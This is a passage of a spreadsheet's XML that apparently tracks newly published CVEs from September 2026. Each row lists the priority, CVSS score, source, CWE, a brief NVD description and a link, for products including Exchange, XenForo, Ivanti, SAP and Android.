      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73309</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="S84"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T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73311</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S85"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T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73312</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S86"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T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S87"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T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75746</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S89"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T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86729</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S90"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T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86840</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.1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2026-09-08</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="S91"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T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53581</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S93"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T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85982</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S95"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T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50093</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12648</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12648</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12651</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12651</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16502</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16502</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18851</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>ivanti:endpoint_manager_mobile</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Ivanti Endpoint Manager Mobile before version 12.10.0.0, 12.9.0.2, and 12.8.0.4 allows a remote authenticated attacker to escalate their privileges to admin.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18851</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28609</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>In read of MatroskaExtractor.cpp, there is a possible out-of-bounds write due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28609</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28618</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
